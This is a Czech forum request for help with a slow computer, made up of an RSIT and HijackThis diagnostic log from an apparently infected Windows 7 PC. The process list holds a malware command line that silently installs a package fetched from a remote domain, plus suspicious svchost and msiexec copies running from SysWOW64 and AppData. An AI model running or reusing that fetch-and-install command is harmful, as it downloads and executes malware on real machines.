Dobrý den,prosím o pomoc se zpomaleným PC.
Log RSIT:
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-04 17:05:14
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 45 GB (19%) free of 238 GB
Total RAM: 4094 MB (56% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 17:05:35, on 4.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Windows\SysWOW64\EhYeIeLWi.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: IEExtension.VDownloaderBHO - {7b523e7c-f096-4e36-a0cb-7efeb5c675c1} - mscoree.dll (file missing)
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5910 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\System32\spoolsv.exe
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"taskhost.exe"
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" PriorityLow
AvastUI.exe /nogui
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
taskeng.exe {CE55E9D6-9CFD-4DDF-8DC4-02D13985DC63}
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\SysWOW64\EhYeIeLWi.exe /q /i http://soundal.info/v9b320qcn586.xue
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\SearchIndexer.exe /Embedding
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
C:\Windows\syswow64\MsiExec.exe -Embedding A15985465EC1C424A4DCDCC1D057DB6B
\??\C:\Windows\system32\conhost.exe "-12185761211896553711-35490092014872967094135208941883093952-994640557-1538657825
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
"C:\Users\Drone\AppData\Local\Media Network Sharing\msiexec64.exe"
\??\C:\Windows\system32\conhost.exe "129430912358868113011192619531033718130-2908606161969490014-1038818388-35746182
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\Drone\AppData\Local\Temp\[58E857]"
\??\C:\Windows\system32\conhost.exe "-97137210416218890891312400296630303544-1021692846-4212050726268231561124311823
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Drone\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fee5ef24d0,0x7fee5ef24e0,0x7fee5ef24f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=296 --on-initialized-event-handle=368 --parent-handle=352 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=3F5F6E92E3FC1FC309FF4C1C51A519B6 --mojo-platform-channel-handle=1000 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --service-pipe-token=5EE6CE5D565D65B609B3D82405F0F4EB --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=5EE6CE5D565D65B609B3D82405F0F4EB --renderer-client-id=3 --mojo-platform-channel-handle=2228 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --service-pipe-token=D30068808BEC98CDBF0012D0C55A03B4 --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=D30068808BEC98CDBF0012D0C55A03B4 --renderer-client-id=4 --mojo-platform-channel-handle=2560 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --service-pipe-token=9EBC94557B5CA6EEA11F75764467E7C2 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=9EBC94557B5CA6EEA11F75764467E7C2 --renderer-client-id=24 --mojo-platform-channel-handle=4692 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --service-pipe-token=2598C152F9213D4084B58B26B27A24E0 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=2598C152F9213D4084B58B26B27A24E0 --renderer-client-id=25 --mojo-platform-channel-handle=5212 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --service-pipe-token=92E9C088A66F17459F4A6F76BD11097C --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=92E9C088A66F17459F4A6F76BD11097C --renderer-client-id=26 --mojo-platform-channel-handle=4336 /prefetch:1
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=988,4291408041083438960,16582968329959829028,131072 --service-pipe-token=51C053963ADBF12C07B493E09BA51ED3 --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=51C053963ADBF12C07B493E09BA51ED3 --renderer-client-id=28 --mojo-platform-channel-handle=4696 /prefetch:1
"C:\Users\Drone\Downloads\RSITx64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]
IEExtension.VDownloaderBHO - C:\Windows\system32\mscoree.dll [2010-11-21 444752]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2018-03-28 588704]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
2018-08-05 22:57:03 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of files/folders modified in the last 1 month======
2018-09-04 17:05:29 ----D---- C:\Program Files\trend micro
2018-09-04 17:01:43 ----D---- C:\Windows\Temp
2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:33:51 ----D---- C:\Windows\SysWOW64
2018-09-04 14:32:05 ----SHD---- C:\Windows\Installer
2018-09-04 14:31:57 ----SHD---- C:\Config.Msi
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-04 13:55:19 ----D---- C:\Windows
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
